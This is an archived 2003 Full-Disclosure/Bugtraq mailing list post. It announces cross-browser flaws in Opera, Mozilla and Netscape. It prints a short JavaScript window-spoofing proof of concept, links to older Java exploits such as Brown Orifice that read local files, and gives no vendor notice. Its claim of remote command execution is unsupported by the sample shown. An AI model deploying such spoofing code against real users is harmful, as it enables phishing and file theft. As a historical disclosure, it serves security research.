lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <33867.66.58.158.195.1054979416.squirrel@www.nothotmail.org>
Date: Sat, 7 Jun 2003 02:50:16 -0700 (PDT)
From: "meme-boi" <meme-boi@...hotmail.org>
To: <full-disclosure@...ts.netsys.com>, <bugtraq@...urityfocus.com>
Subject: Cross-Platform Browser vulnerabilities - Critical



Background:

Once upon a time in the far off land of 1997 dwelled horrible cross platform
browser vulnerabilities that threatened every user of the internet.

Pioneers of Java Security Model exploitation such as Ben Mesander,Dan
Brumleve, & Georgi Guninski showed us wonderful methods of loading
arbitrary classes and images, connection to arbitrary hosts with class
loading and remote browser tracking , to name just a few.
We at meme156 laboratories are pleased to announce theyyyree baaaack!

Let no hat, black white or grey, wander in on or about the www without fear.



Synopsis:
--------

         Opera, Mozilla & Netscape with javascript enabled are vulnerable
         to remote command execution. This has been tested on Microsoft,
         and many many Unices. Macintosh may also be vuln.

         Ironically enough, IE is unaffected.

Versions: all current versions , not sure how far back
--------

Impact: Critical - Go Threatcon , it's ya berfday!
-------



Exploit:
-------

very minimal sample below followed by links to long dead bugs resurrected
from the graves of exploits past by this most excellent everlasting bug.
Old school window spoofing tekneeq:


-----------snip--------------

<script>
function werd()
{
a.document.open();
a.document.write("<h1>werd</h1>");
a.document.close();
}

function winopen() {

a=window.open("view-source:javascript:location='http://www.iss.net';");

setTimeout('werd()',23000);
}

</script>

--------------------------------------------------------------------------


I have provided a live version of this mild example here:

http://meme-boi.netfirms.com/werd.html


Resurrected Juarez:
-------------------


http://neurosis.hungry.com/~ben/msie_bug/

^From the depths of '97 this old treasure is back, demonstrating
 remote class loading.


http://www.nat.bg/~joro/b11.html

^amaze your freinds! show them their pr0n history with guninskis old
 classic :)


http://209.100.212.5/cgi-bin/search/search.cgi?searchvalue=brown+orifice&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0

^circa 2000 , Dan Brumleve's masterpiece is back!

"New bugs were discovered in Netscape's implementation of Java has been
found which allows a remote site to read any file on the client machine
and to set up a Java server which anyone can connect to. Brown Orifice
HTTPD starts a Java server which allows others to read files on your
machine."


Fix: Disable Java immediately



Vendor Notification: None - This is full disclosure


Commentary:

There are many, many more issues than I have discussed. The minimal release
is for giving the blackhats time to play.

Editors note: I miss that old channel still samael. parsekungfu4lyfe


Summer of the Sickness is drawing near.......

Copyright © 2003, Paper Street Soap Company, Inc.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ